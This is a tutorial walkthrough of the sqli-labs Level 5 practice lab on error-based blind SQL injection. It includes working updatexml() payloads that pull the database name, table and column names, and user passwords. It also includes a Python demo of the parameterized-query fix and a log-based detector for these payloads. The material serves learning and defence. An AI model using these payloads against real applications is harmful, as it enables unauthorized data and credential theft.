sqli-labs Level 5 (GET submission, error-based blind injection, single-quote enclosed): ideas for passing the level

Article directory

  • Preface
  • 1. Review the knowledge points from previous levels
  • 2. Knowledge you need to know about the fifth level of the shooting range
    • 1. What is blind injection?
    • 2. How many categories is blind injection divided into?
    • 3. Related functions used for error-based injection
  • 3. Ideas for the fifth level of the shooting range
    • 1. Determine the injection point
    • 2. Find the display positions
    • 3. Extract the database name
    • 4. Extract the database tables
    • 5. Extract the database columns
    • 6. Extract the key information in the database
  • Summary

Preface

This article is only used for learning and reflection to consolidate SQL injection knowledge, and is prohibited from being used for illegal attacks. Note that the shooting range is a platform for practice, and you cannot go to unauthorized websites for penetration testing!

1. Review the knowledge points from previous levels

Through continuous practice in the first few levels, we gradually worked out the basic approach to SQL injection when the page echoes data, and became familiar with the whole injection process. The test point in those levels was how to determine the type of injection point: is it numeric or character? If it is character type, how is it closed? These are all things we solved and thought through in the previous levels. Without further ado, let's see what kind of sparks this level will create.

2. Knowledge you need to know about the fifth level of the shooting range

  • 1. What is blind injection?
  • 2. How many categories is blind injection divided into?
  • 3. Related functions used for error-based injection

1. What is blind injection?

SQL injection is divided into two categories: injection with echo and injection without echo.

  • 1. Echo injection: the data entered by the user is echoed back into the page. The first 4 levels of the shooting range are a typical example. We can use the page's habit of echoing data to insert a union query and have it echo the information we want.

  • 2. No-echo injection: obviously the opposite of echo injection. The page does not echo the data entered by the user. In other words, the methods from the earlier levels do not work on this level, so this level uses blind injection.

2. How many categories is blind injection divided into?

Blind injection is generally divided into three categories: error-based injection, time-based blind injection and Boolean-based blind injection.

  1. Error-based blind injection: the user splices related functions into the query so that the database is forced to produce an error, and that error message carries the information we want.
  2. Time-based blind injection: functions such as sleep() and if() are spliced into the query, and database information is guessed from the difference in how long the browser takes to get the page back.
  3. Boolean-based blind injection: database information is guessed from whether the related condition is evaluated as true or false, i.e. from whether the page looks like the "true" page or the "false" page.

3. Related functions used for error-based injection

The first two functions are only available in higher MySQL versions (greater than 5.1). What they have in common is that when the XPath argument is not a valid XPath expression, MySQL puts that argument into the error message, so the result of a subquery concatenated into it is leaked through the error text.

  1. extractvalue() This function returns a string containing the queried value from the target XML.

Syntax: extractvalue(XML_document, xpath_string)

The first parameter: string format, the name of the XML document object. The second parameter is the XPath string.

  2. updatexml() This function matches and replaces XML blocks using different XML tags.

Syntax: updatexml(XML_document, XPath_string, new_value)

  3. floor() Numeric function that returns the largest integer less than or equal to the given numeric expression.

Syntax: FLOOR(numeric_expression)

  4. There are many more error-based injection methods; you can read this article: https://www.jianshu.com/p/bc35f8dd4f7c

3. Ideas for the fifth level of the shooting range

  • 1. Determine the injection point
  • 2. Find the display positions
  • 3. Extract the database name
  • 4. Extract the database tables
  • 5. Extract the database columns
  • 6. Extract the key information in the database

1. Determine the injection point

(See the screenshot.) The old rule is to test with and 1=1 and and 1=2. With id=1 both cases are normal, which rules out a numeric injection point. Submitting id=1' directly makes the page abnormal, and the error message tells you the value is probably enclosed in single quotes. Trying id=1' and 1=2-- + gives an error, while 1=1 is normal, which confirms that this is an injection point enclosed in single quotes.

Someone may ask: isn't an error message echoed here? Why do we need error-based blind injection instead of a simple union query? "No echo" means that the result of the SQL statement we inject cannot be brought back to the web page; it does not mean that no error message is shown after the quote is closed, or that the page shows nothing at all. (There are also cases with no response of any kind; we will talk about those later.) The precondition for error-based blind injection is that there is something on the page that displays the error message. Here the error message is clearly displayed, and it shows the single-quote enclosure.
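Why the ' probe and the and 1=1 / and 1=2 pair behave the way they do, and what actually closes the hole, can be seen in a few lines of Python. This is an added example, not the lab's own PHP: it uses an in-memory SQLite table with constructed rows in place of the lab's MySQL users table, rebuilds the lab's pattern of pasting the id value into a single-quoted literal, and puts a parameterized query beside it so the difference is visible on the same probes.

```python
import sqlite3

# Constructed sample rows standing in for the lab's users table (not the lab's own data).
ROWS = [(1, "alice", "pw-one"), (2, "bob", "pw-two"), (3, "carol", "pw-three")]


def make_db():
    """Build a throwaway in-memory database with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_lookup(conn, user_id):
    """The pattern behind Level 5: the request value is pasted inside single quotes.

    A value of 1' and 1=2-- closes the literal, appends a condition and comments
    out the rest of the statement, so the client controls the WHERE clause.
    """
    sql = f"SELECT username FROM users WHERE id='{user_id}' LIMIT 1"
    return conn.execute(sql).fetchone()


def safe_lookup(conn, user_id):
    """The fix: bind the value as a parameter.

    Whatever the client sends is one string literal; quotes and comment
    markers inside it never reach the SQL parser as syntax.
    """
    sql = "SELECT username FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchone()


# The same probes the walkthrough submits as the id parameter.
PROBES = ("1", "1'", "1' and 1=1-- ", "1' and 1=2-- ")


def probe(lookup):
    """Run each probe through a lookup function; map probe -> username, None, or error text."""
    conn = make_db()
    results = {}
    for p in PROBES:
        try:
            row = lookup(conn, p)
            results[p] = row[0] if row else None
        except sqlite3.Error as exc:
            results[p] = f"error: {exc}"
    return results


if __name__ == "__main__":
    for name, fn in (("string-built query", vulnerable_lookup), ("parameterized query", safe_lookup)):
        print(f"== {name}")
        for p, r in probe(fn).items():
            print(f"  id={p!r:22} -> {r!r}")
```

With the string-built query the bare quote raises a syntax error (the page's "abnormal" state), and 1=1 still returns alice while and 1=2 returns nothing: exactly the true/false pair the walkthrough uses to confirm a single-quote enclosed injection point. With the parameterized query all three crafted probes simply match no row, because the id is compared as a whole string.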

2. Find the display positions

(As shown in Figure 1) The injection statement here is

id=1' order by 4-- +

It shows that there are three display positions, but the next step is different: the information cannot be echoed. If you don't believe it, let's try a union query. (As shown in Figure 2)

Figure 1
Figure 2

Sure enough, I found that the page echoed nothing. So let's just honestly and practically use error reporting, hahaha.

3. Extract the database name

(As shown in the figure) The injection statement here is

id=1' and updatexml(1,concat(0x3a,(select database()),0x3a),1)-- +

The database name is successfully exposed in the error message.

4. Extract the database tables

(As shown in the figure) The injection statement is

id=1' and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a),1)-- +

Here the a in limit a,1 is incremented starting from 0; at limit 3,1 the query returns the table name users, the suspicious table in this database.

Why not use group_concat? Because the error message produced by the updatexml function has a length limit; with group_concat the error output may be truncated, so we use limit to query one row at a time.

5. Extract the database columns

(As shown in the figure) The injection statement is

id=1' and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 0,1),0x3a),1)-- +

We find that limit 1,1 is username and limit 2,1 is password.

6. Extract the key information in the database

(As shown in the figure) The injection statement is

id=1' and updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1)-- +

Keep incrementing the limit offset to obtain all the passwords; the usernames are obtained the same way and are not shown here.
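From the defender's side, steps 3 to 6 above leave a distinctive trace in the web server's access log: updatexml( or extractvalue( inside a query parameter, information_schema lookups, and, because of the length limit discussed under step 4, a run of requests from one client that walk limit 0,1, limit 1,1, limit 2,1, ... one row at a time. The following Python is an added example, not part of the original article or of sqli-labs: it parses constructed Apache-style log lines (the /Less-5/ path, timestamps and client addresses are assumed sample values), decodes the query string the way PHP's $_GET would, and flags clients showing those patterns.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines, not captured traffic. One client (10.0.0.5) replays
# the walkthrough: a quote/Boolean probe, then updatexml() with database(), then a
# row-by-row walk of information_schema.tables with limit 0,1 .. limit 3,1.
SAMPLE_LOG = "\n".join(
    [
        '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-5/?id=1 HTTP/1.1" 200 512',
        '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-5/?id=1%27%20and%201%3D2--%20+ HTTP/1.1" 200 412',
        '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /Less-5/?id=1%27%20and%20updatexml(1,concat(0x3a,(select%20database()),0x3a),1)--%20+ HTTP/1.1" 200 640',
    ]
    + [
        f'10.0.0.5 - - [01/Jan/2024:10:00:{12 + 3 * i:02d} +0000] "GET /Less-5/?id=1%27%20and%20updatexml(1,concat(0x3a,'
        f"(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%20{i},1),"
        f'0x3a),1)--%20+ HTTP/1.1" 200 640'
        for i in range(4)
    ]
    + ['10.0.0.7 - - [01/Jan/2024:10:00:30 +0000] "GET /Less-5/?id=2 HTTP/1.1" 200 512']
)

# client, timestamp and request target from a combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# the two XML error functions from section 2.3 of the article, plus the floor()/rand() pattern
ERROR_FUNC_RE = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)
FLOOR_RAND_RE = re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I)
SCHEMA_RE = re.compile(r"\binformation_schema\.", re.I)
# "limit N,1": the one-row-at-a-time walk forced by the 32-char error length limit
LIMIT_PROBE_RE = re.compile(r"\blimit\s+(\d+)\s*,\s*1\b", re.I)


def decoded_params(request_target):
    """Return (name, value) pairs of the query string, percent-decoded with '+' as space (as $_GET sees them)."""
    return parse_qsl(urlsplit(request_target).query, keep_blank_values=True)


def analyze(log_text):
    """Per-client counters for the error-based injection signals in the log."""
    stats = defaultdict(lambda: {"error_func": 0, "floor_rand": 0, "schema": 0, "limit_offsets": set()})
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        client, _ts, target = m.groups()
        s = stats[client]
        for _name, value in decoded_params(target):
            if ERROR_FUNC_RE.search(value):
                s["error_func"] += 1
            if FLOOR_RAND_RE.search(value):
                s["floor_rand"] += 1
            if SCHEMA_RE.search(value):
                s["schema"] += 1
            lm = LIMIT_PROBE_RE.search(value)
            if lm:
                s["limit_offsets"].add(int(lm.group(1)))
    return stats


def alerts(log_text, min_probes=3):
    """Clients worth a look, each with the reasons; min_probes is how many distinct limit offsets count as a walk."""
    flagged = []
    for client, s in analyze(log_text).items():
        reasons = []
        if s["error_func"] or s["floor_rand"]:
            reasons.append("error-based function in a query parameter")
        if s["schema"]:
            reasons.append("information_schema enumeration")
        if len(s["limit_offsets"]) >= min_probes:
            reasons.append(f"row-by-row LIMIT walk over {len(s['limit_offsets'])} offsets")
        if reasons:
            flagged.append((client, reasons))
    return sorted(flagged)


if __name__ == "__main__":
    for client, reasons in alerts(SAMPLE_LOG):
        print(client, "->", "; ".join(reasons))
```

Decoding the parameter before matching matters: in the raw log the payload appears as %27 and %20, and the trailing "+" is only a space once decoded, so a rule applied to the undecoded line is easy to sidestep with a different encoding. The LIMIT-walk counter is the signal that survives even when the function names are obfuscated, because the length limit on updatexml() output forces the one-row-per-request pattern the article describes.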

Summary

This level is the turning point in the shooting range, from echo injection to no-echo injection. By working through this level I learned how to use error-based blind injection. In fact, there are many other methods, such as the extractvalue() function; in short, you just need to know the approach. This article was written by a beginner, myself, in order to consolidate SQL injection knowledge. If you are passing by, please give me some advice!